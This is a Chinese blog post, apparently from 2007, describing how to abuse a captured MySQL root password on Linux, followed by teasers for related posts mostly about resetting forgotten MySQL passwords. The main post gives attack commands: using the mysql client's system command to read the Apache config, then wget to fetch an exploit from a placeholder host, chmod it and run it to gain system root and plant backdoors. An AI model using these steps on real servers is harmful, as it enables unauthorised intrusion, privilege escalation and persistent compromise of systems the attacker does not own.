linux下mysql 5.x得到root密码后的另外一种利用方式

原创 2007年10月07日 21:50:00
 mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的范围内。

    一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去,创建一个表,然后outfile,搞到一个webshell ,然后提权如此这般。今天我们换一种方式。

    按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有的就不一定了。但是按照我的的方法,没有必要再去找web路径了,直接执行

mysql>system vi /etc/httpd/conf/httpd.conf;

    直接这样就可以找到web的路径,当然,我们的目的并不是找web路径,放webshell进去。我们是要来做其他的事情,比如,下载exp执行,搞到root权限,然后装后门虾米的

mysql>system wget http://xxxx.xxx.com/xxxx ;

mysql>system chmod +x xxxx;

mysql>system ./xxxx;

     这样mysql的root此时就成为system的root了,剩下的事情,如果开了ssh,就ssh上去,输入mysql的用户密码,ok,搞定。

 

Mysql的Root密码忘记,查看或修改的解决方法(图文介绍)

首先启动命令行 1.在命令行运行:taskkill /f /im mysqld-nt.exe 下面的操作是操作mysql中bin目录下的一些程序,如果没有配置环境变量的话,需要切换...
  • zjg528
  • zjg528
  • 2015年12月18日 14:00
  • 14577

Mysql的Root密码忘记,查看或修改的解决方法(图文介绍)

首先启动命令行 1.在命令行运行:taskkill /f /im mysqld-nt.exe 下面的操作是操作MySQL中bin目录下的一些程序,如果没有配置环境变...
  • lixingshi
  • lixingshi
  • 2017年04月18日 23:39
  • 619

Mysql 漏洞利用(越权读取文件,实战怎么从低权限拿到root密码)[转]

cnrstar (Be My Personal Best!) | 2014-05-20 21:58 众所周知,Mysql的用户在没有File权限情况下是无法通过Load_file读文件或者通过into...
  • h4ck0ne
  • h4ck0ne
  • 2016年01月23日 17:50
  • 1080

Windows下忘记MySQL root密码解决方法

Windows下忘记MySQL密码的解决办法网上好多好多,可是,我发现,如果采用Windows服务启动的时候,安装网上通过命令行修改root密码的方法行不通。经过实验,发现,Windows的服务运行的...
  • yin138
  • yin138
  • 2016年05月11日 11:18
  • 1937

mysql5.7忘记密码时,修改root密码

(1).由于MySQL5.7在安装完后,第一次启动时,会在root目录下生产一个随机的密码,文件名为 .mysql_secret 所以,登录时需要用随机密码登录,然后通过以下命令修改密码 “SE...
  • xinliuqianxue
  • xinliuqianxue
  • 2016年08月08日 22:39
  • 15417

Mysql的Root密码忘记,查看或修改的解决方法

如果忘记了 MySQL 的 root 密码,可以用以下方法重新设置: 首先启动命令行 1.在命令行运行:taskkill /f /im mysqld-nt.exe 下面的操作是操...
  • Yinlinda
  • Yinlinda
  • 2017年02月10日 15:15
  • 3224

初次使用phpMyAdmin & MySql修改root密码

刚刚用phpMyAdmin就遇到了麻烦,在phpMyAdmin中设置了root密码,忘了!最后不得不重新修改密码。 首先打开phpMyAdmin: 找到phpmyadmin文件夹下的配置文件 con...
  • theArcticOcean
  • theArcticOcean
  • 2016年01月20日 17:50
  • 3356

mysql5.7.*修改root默认密码

mysql5.7.*修改root默认密码 知道 MySQL 出了5.7了,并且网上说性能提高了一两倍,于是在虚拟机上安装了个 CentOS 7,在上面安装 MySQL 5.7 我使...
  • u014228375
  • u014228375
  • 2017年01月19日 19:16
  • 514

Mysql root 用户密码忘记后重置root密码

[windows] 1、停止mysql服务:打开命令行窗口CMD,Net stop mysql 2、用另外一种方式启动Mysql:在命令行进入到mysql的安装路径下的bin目录下使用 ...
  • hj402555749
  • hj402555749
  • 2013年01月23日 09:26
  • 15565

mysql 5.7 设置root密码方法

摘要:最新版的mysql 5.7与旧版的mysql重新设置root用户密码的方法不一样, mysql5.7 设置root密码方法: update mysql.user set authentic...
  • psh1234
  • psh1234
  • 2016年09月03日 20:16
  • 1073
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:linux下mysql 5.x得到root密码后的另外一种利用方式
举报原因:
原因补充:

(最多只允许输入30个字)